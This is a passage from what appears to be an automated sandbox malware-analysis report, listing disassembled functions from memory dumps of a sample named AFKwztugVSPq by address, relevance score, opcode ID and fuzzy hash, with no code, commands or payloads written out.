                  • Instruction Fuzzy Hash: 5051AE31A0CA998FDB48EF1888555BA77E2FB98354F14457EE44AC72C2CF34E842C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F330F5 Relevance: .2, Instructions: 165COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f0f985f900171fc148f5e13e9f9ffb6d915068502c74000ba401023fa3a9f8c
                  • Instruction ID: a6acf2c216c639ab7ddd74d030921d2607703d15aa06efa798a27b59613dcaad
                  • Opcode Fuzzy Hash: 5f0f985f900171fc148f5e13e9f9ffb6d915068502c74000ba401023fa3a9f8c
                  • Instruction Fuzzy Hash: EF511370D0D61E8EEB54EBA8E4946EDBBB1EF58341F50007AD009E7292DB38A944CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F320B5 Relevance: .1, Instructions: 138COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c2fc1247357a38aff4c1dfb68950034835e55bb459f82389f6d62cf1744c83bc
                  • Instruction ID: 8c89a54bb2a152c7ef92c132b2835e46f67a4149b76e05cddf003a0c270d45a6
                  • Opcode Fuzzy Hash: c2fc1247357a38aff4c1dfb68950034835e55bb459f82389f6d62cf1744c83bc
                  • Instruction Fuzzy Hash: BF412731A0D64A4FE346FB7898951B9BBE0EF4A391F0544BBD44DC71D2DF28A8418355
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3353B Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6074cc448a46d9daceb8d008eb73cbc75f85834f5542780d6f96cdace2727ab6
                  • Instruction ID: 672c29995da621a7c858da860f64332a48a286e8109eb8e49f35d30d37f5a229
                  • Opcode Fuzzy Hash: 6074cc448a46d9daceb8d008eb73cbc75f85834f5542780d6f96cdace2727ab6
                  • Instruction Fuzzy Hash: 56418C31E1D94A9FEB85EB2CE4596BDBBE0FF59340F4400BAD00AD32D2DF2868018715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3AC15 Relevance: .1, Instructions: 103COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a24f01b5a458ae7c4c9adb70bec871822a984e233c6b50d530f89f49f45e6c91
                  • Instruction ID: 31b7d28db73f1b83e86734fbd9e814cd812857ace54ae36a986f4c750566ec35
                  • Opcode Fuzzy Hash: a24f01b5a458ae7c4c9adb70bec871822a984e233c6b50d530f89f49f45e6c91
                  • Instruction Fuzzy Hash: 8C31E231A0D60A9FE701FB68A8895E977F0EF55351F0545B3D40CCB0A3EF38A08487A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F323DB Relevance: .1, Instructions: 74COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40fcfe94e2a58a2aeb41ae3162efdfbd0d5a04e6579fd81f31f51d01494452f
                  • Instruction ID: 2edda51bc8a86909b1e9f96ee7eeb55b1b571e4de14f4679ba192c26462dd252
                  • Opcode Fuzzy Hash: c40fcfe94e2a58a2aeb41ae3162efdfbd0d5a04e6579fd81f31f51d01494452f
                  • Instruction Fuzzy Hash: 23212731D0C61A8EEB14BB94C841BFDB3B4EF55392F40167AC41EA31D1DF38AA548A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F33304 Relevance: .1, Instructions: 71COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68046ea17854f0a1ca4b4026192bdcd6b3c12e9588de8aa6ec0fb4f20d9c09a8
                  • Instruction ID: fa543c68b38a5122ce5425a51c357e18512d60c511e794d9890b154116169faf
                  • Opcode Fuzzy Hash: 68046ea17854f0a1ca4b4026192bdcd6b3c12e9588de8aa6ec0fb4f20d9c09a8
                  • Instruction Fuzzy Hash: 19218C3084D78A9FE743EB7888585A97FF0FF1A350F0944EBD449CB0A2EA28A445C721
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F30A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dad3784032fd34e8ee71c253f336eacbd464798d5f8f65122313bbfe7151e6d4
                  • Instruction ID: 171baa5c1930b00df3c0565c38de1fc089e3442c3a93816e6c42c0bd9fe8dc52
                  • Opcode Fuzzy Hash: dad3784032fd34e8ee71c253f336eacbd464798d5f8f65122313bbfe7151e6d4
                  • Instruction Fuzzy Hash: BC116A31D0954E9FEB80FB68D8492BD7BE0FF98391F4405B7D809C6192EF38A5448740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3372F Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 266114d654d428b319f4d47f375250ddd1b3c847cb244e94252274818446f32d
                  • Instruction ID: b0ac7d16d18b0ddc53a1774a51dcc3b445f71b62dfe78191fe20a0d1183869ec
                  • Opcode Fuzzy Hash: 266114d654d428b319f4d47f375250ddd1b3c847cb244e94252274818446f32d
                  • Instruction Fuzzy Hash: DE118B31A0D9098FE758DF68E8153BA7BE1EB85325F50007EC00AD32D2DFFA14158B81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F33491 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: af75e0b5ab754c10f379367a728ce660fb9a09933ef5d1acdc06e747f5c1e4cd
                  • Instruction ID: 203f97c70046e1045f7e8e6bec688a445f364611bdeffc774c6f6a91bb3d7453
                  • Opcode Fuzzy Hash: af75e0b5ab754c10f379367a728ce660fb9a09933ef5d1acdc06e747f5c1e4cd
                  • Instruction Fuzzy Hash: C511793090C68E8FEB9AEF68C8592BA7BA0FF18341F4405BBD41AC61D2EB35A550C704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F32E01 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f384d1b3a91c9b53cb9c2c7bfd7a9260e547cb449d214934247d25ba3962b51
                  • Instruction ID: 96fbed85c6988a23bccd6dbc592df8a98c492c7ed84679fb3a7fdddf7ec99d16
                  • Opcode Fuzzy Hash: 8f384d1b3a91c9b53cb9c2c7bfd7a9260e547cb449d214934247d25ba3962b51
                  • Instruction Fuzzy Hash: 5C018B31C1D64E8FEB91BB64844A2A9BBE0FF59341F0144B7D80CC60A2EF38E1848704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98c5b8b85373f2f7e7265071a62b8472b2acb4b91c9fe441c395ec2813a6b7c0
                  • Instruction ID: b60d1834deb3469480bf5b75bbbd1eb96d8d08dec272c2ddae7623093e12ba2c
                  • Opcode Fuzzy Hash: 98c5b8b85373f2f7e7265071a62b8472b2acb4b91c9fe441c395ec2813a6b7c0
                  • Instruction Fuzzy Hash: 5601483090990E8EEB88EF24C0596BAB7A1FF68385F50447EE40EC21D1DB76A590CB48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F32E79 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5c4bc20d917828b8847aab7a6f20e08a045e26d4d9da3a2973dad077ebd94689
                  • Instruction ID: c55d19c4a4b5d413b06dec30a93a7d251155b3f4537c641a96b547a1157ed691
                  • Opcode Fuzzy Hash: 5c4bc20d917828b8847aab7a6f20e08a045e26d4d9da3a2973dad077ebd94689
                  • Instruction Fuzzy Hash: F601F23080D68A4FE742FBB8884A5A97BE0FF5A342F1509B3D40DC70E2EB38A484C710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3ABA9 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e79b483ce844a5019b4ef2d0be659071c00e78284607e6649cc10dd0a6ae9113
                  • Instruction ID: b1848d4abc664bac867331af204ec6efd72040ff726a924408cba1b93c8b9b15
                  • Opcode Fuzzy Hash: e79b483ce844a5019b4ef2d0be659071c00e78284607e6649cc10dd0a6ae9113
                  • Instruction Fuzzy Hash: 68018F3080DA895FE752BB7888595A9BBE1FF1A341F0A09F3D408C70A2EF28E4948715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F327DD Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9933b52c42ee361349646c8c76008dcaf38bbbe4c8d4bc7b5b3aab675dabe4e
                  • Instruction ID: 13b8e95ce809b49c44e75cfff4798dd57d0192546d869739359c552489b82fef
                  • Opcode Fuzzy Hash: c9933b52c42ee361349646c8c76008dcaf38bbbe4c8d4bc7b5b3aab675dabe4e
                  • Instruction Fuzzy Hash: 4501783091E64A8FE792FB6888596A9BBE0FF59342F5545B7D408C70E2EB38E044C704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6452b2794b1568946a5dec44d2a468c4c00a1798bfc664a04f8508b826f25e9
                  • Instruction ID: 367ebc8e50e8663d9768e789428646d016861f46a7e00ffeeb082a3452f84c3c
                  • Opcode Fuzzy Hash: a6452b2794b1568946a5dec44d2a468c4c00a1798bfc664a04f8508b826f25e9
                  • Instruction Fuzzy Hash: 9C01693081860E9EEB49EF64C4992BAB7A1FF18346F50087EE40EC21D1EF35A550C644
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8810892669dfce301656dc8e28eefbde8e15ac9c62d3920da31ea2be2711d498
                  • Instruction ID: 01233042dafd02994394ecaf16cf090fa75c41eba5d55584290f35b83fb7a20f
                  • Opcode Fuzzy Hash: 8810892669dfce301656dc8e28eefbde8e15ac9c62d3920da31ea2be2711d498
                  • Instruction Fuzzy Hash: 5D016930818A0E9EEB48FB6484592BAB7A1FF18346F10087EE81EC22D1DF35A550C614
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7f44e1d4e544c7d60895a7901eef059d9e07636e3438e1c7d83836ff84681a7f
                  • Instruction ID: 41b5686a1540c40d6bfa110792551d30fba4adccea2145c0dfdbf16afdf6c02d
                  • Opcode Fuzzy Hash: 7f44e1d4e544c7d60895a7901eef059d9e07636e3438e1c7d83836ff84681a7f
                  • Instruction Fuzzy Hash: 98F06D3081E64E8FEB95EF2494156FA77A4FF15388F50057AF80DC21D1DB39A5A0CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F31C1D Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a4912724edefe024f9f0f11137473bc3bd11a2a916aedb8c99693d6f8a20669
                  • Instruction ID: 6926b62d138d77e5be807bb1dd581ead267773f8f1c6b1c927e2cb189ef0f5ed
                  • Opcode Fuzzy Hash: 6a4912724edefe024f9f0f11137473bc3bd11a2a916aedb8c99693d6f8a20669
                  • Instruction Fuzzy Hash: 6D01817090E68E8FEB55EF2484552F97BA1FF55380F4400BFE808C61D2DB759594C748
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3B2C8 Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b384d09979653635ff98c4996849399ea335ecfb78d1970853d74b4e4c4b2d91
                  • Instruction ID: b1f29b1027d2dc4a7af07ce526b8ef47cca6e066abf5a077e1419302526675e7
                  • Opcode Fuzzy Hash: b384d09979653635ff98c4996849399ea335ecfb78d1970853d74b4e4c4b2d91
                  • Instruction Fuzzy Hash: 91F01970A1E6298EEB95EB18C455BA973B1FF58340F1042E6C40DD2296DF3499818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F3276D Relevance: .0, Instructions: 34COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9904877bd550994cd8ecd1717e44ddaf6126c1d80ddc53170ca3215ca1a4534
                  • Instruction ID: bc93f31ce800a6ae8226f5f604864b978414d08fbfb2e1dd42077607f869a153
                  • Opcode Fuzzy Hash: f9904877bd550994cd8ecd1717e44ddaf6126c1d80ddc53170ca3215ca1a4534
                  • Instruction Fuzzy Hash: 0DF0907080D68E8FEB59AF6488191B93BA1FF16252F4404BBE809C61D2EB389454C701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F326F9 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60c66446edac25217a83bffb45d63349ad65d41c5b95426f2c67604afb556bec
                  • Instruction ID: 90cef54ee7635c188e2251ba8026c43fc42de52a5189d2b5acaa17eaa084dd10
                  • Opcode Fuzzy Hash: 60c66446edac25217a83bffb45d63349ad65d41c5b95426f2c67604afb556bec
                  • Instruction Fuzzy Hash: EDF0963080E7C94FE75AAF6488691B97FA1FF16245F4505BBD409C60D2EB389558C741
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F30F80 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3d5fb10d4d69a04526a173139410312c5341945d816bd5cc363be7864131705
                  • Instruction ID: efbbb5ac49fc20225833c851065c952a0b6a7f9c3aed0b88fd3e084b5031f395
                  • Opcode Fuzzy Hash: e3d5fb10d4d69a04526a173139410312c5341945d816bd5cc363be7864131705
                  • Instruction Fuzzy Hash: C3F0173090D5098FEB54FB14C844BEEB6B1EB94355F105276D809A3295DF386A84CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F37C25 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9b0fcb454612bcaa26de96be15900819dabea62a5ef1036c4257cc9240e55741
                  • Instruction ID: cb055e65d08c48e63692360adf29c1989ff604d0a95db0646f34c56bcf48f4a2
                  • Opcode Fuzzy Hash: 9b0fcb454612bcaa26de96be15900819dabea62a5ef1036c4257cc9240e55741
                  • Instruction Fuzzy Hash: E3F0677095992E8EEFA4EB088840BBD76A1EB58342F5054BAC01DD32C1DB746A809F44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F378FF Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.2217366615.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ff848f30000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f16ad9fa2eea7c007483a982431a8f12b5e7a5f1dca759bd8f6066dc86f6678
                  • Instruction ID: 2d659a73e2523c24a5bf82a2a863e56d84a88b15d6a5183edb4490858951d1d2
                  • Opcode Fuzzy Hash: 1f16ad9fa2eea7c007483a982431a8f12b5e7a5f1dca759bd8f6066dc86f6678
                  • Instruction Fuzzy Hash: 4FE04570958D2E8FDFA8EB188890BB977B1FB58302F5105AAC01DD3281DB745A808F04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Function 00007FF848F116F7 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: $/$/
                  • API String ID: 0-1100692818
                  • Opcode ID: 1d2b140ac50c64ae734d0c2dcf17b6461eb6a3716f47087d92e4c2e52ba631ef
                  • Instruction ID: a5ca77d00808a2d58497a1d5015af8b2ca6e38ea810220df3c252b1007df9b08
                  • Opcode Fuzzy Hash: 1d2b140ac50c64ae734d0c2dcf17b6461eb6a3716f47087d92e4c2e52ba631ef
                  • Instruction Fuzzy Hash: 9631E274D0862A8EEB60EF64C8847EDBBF1AB44340F5041B6D44CA72C2DB389AC4DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0EF18 Relevance: 2.5, Strings: 2, Instructions: 16COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0d000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: &$h
                  • API String ID: 0-1895885708
                  • Opcode ID: 46666fb20749c5b59e34acb25aca662b66fe68343891492f7aebca58bae595a1
                  • Instruction ID: 917668f687d0a990b2116232ccd235905520c5fa2cc28de45b42626f0f4ff5b3
                  • Opcode Fuzzy Hash: 46666fb20749c5b59e34acb25aca662b66fe68343891492f7aebca58bae595a1
                  • Instruction Fuzzy Hash: D7E0E570D0C22A8FEFA8EB01C851BADB3B6AB44700F0040E8D40966280CB396E808F10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F005ED Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: >P_^
                  • API String ID: 0-3975955286
                  • Opcode ID: 117007f5ec0debd21415d402d81a9f4820eda2630e559a61e53a3973697ddec1
                  • Instruction ID: 705afa025c60bf14f059f828897845d554d54770c4ad15ff778ce66d0e5b0e27
                  • Opcode Fuzzy Hash: 117007f5ec0debd21415d402d81a9f4820eda2630e559a61e53a3973697ddec1
                  • Instruction Fuzzy Hash: 25F02B3084D64E9FEB15AF6488952FA7794FF0A345F44093AE82DC11C2FB387554C791
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F115BB Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID: /
                  • API String ID: 0-2043925204
                  • Opcode ID: d77b0c46f11c00b1c22575dea386766ac6515fb3ca7f2e0b097cbb24085ba4c3
                  • Instruction ID: b7c0ded638df82816b5876e8beb37e0ee369bb9d645dcfd0efbc31f666b4cf66
                  • Opcode Fuzzy Hash: d77b0c46f11c00b1c22575dea386766ac6515fb3ca7f2e0b097cbb24085ba4c3
                  • Instruction Fuzzy Hash: 32F0E734908619CEEB14EF60C880BED77B1FB14351F5051AAD459E72C2DB786A84DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F13405 Relevance: .6, Instructions: 551COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee15888e73f5f3002f50f3f3bc22bc76d18974647cb2bccc6d61a768f1954d54
                  • Instruction ID: e0d78956808055ef70ea01a74822566bdf3716a7dc287c3246135ba9e532fbed
                  • Opcode Fuzzy Hash: ee15888e73f5f3002f50f3f3bc22bc76d18974647cb2bccc6d61a768f1954d54
                  • Instruction Fuzzy Hash: EB51BE22D0E6C19FE317A77858A91A97FB0FF52354F0905FBC088CB0D3DA1CA8488366
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F134C8 Relevance: .5, Instructions: 451COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3bdcb719e8a67c40a5f636722053b0f3ed3a182e235c24231df796efda14ad36
                  • Instruction ID: e49d7e4742380f02c4677275da5e897f49fb050dfc1c002f7c85b8a1dec41c89
                  • Opcode Fuzzy Hash: 3bdcb719e8a67c40a5f636722053b0f3ed3a182e235c24231df796efda14ad36
                  • Instruction Fuzzy Hash: F7117C2180EBC69FE756AB7848651A97FB0AF12380F0905FBD488CA0D3DA1CA908C356
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0DA99 Relevance: .4, Instructions: 400COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0d000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48ed2e8facc846a1ced54679e7a3b104a46dfb35b74a473bc492c5b61a8407bc
                  • Instruction ID: d0451677c51ee44d0071a30a59b238b31cc2a71aaa24a7fc52151990061e956c
